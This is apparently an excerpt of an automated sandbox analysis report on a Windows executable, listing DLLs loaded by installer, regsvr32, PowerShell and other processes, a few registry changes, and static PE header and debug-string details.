Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: version.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: amsi.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: dwrite.dll
Source: C:\Users\user\Downloads\ST.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gigantic Monkey_is1

Jump to behavior

Source: lO5lV39HDj.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: lO5lV39HDj.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: lO5lV39HDj.exe

Static file information: File size 69145961 > 1048576

Source: lO5lV39HDj.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
Source: lO5lV39HDj.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
Source: lO5lV39HDj.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157e00

Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lO5lV39HDj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: lO5lV39HDj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: lO5lV39HDj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Diagnostics.TraceSource.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256Q source: lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.Primitives.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03AE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A05861000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2536034420.0000015A017F1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.pdb source: powershell.exe, 00000004.00000002.1342379280.000002B796676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2536034420.0000015A017F1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
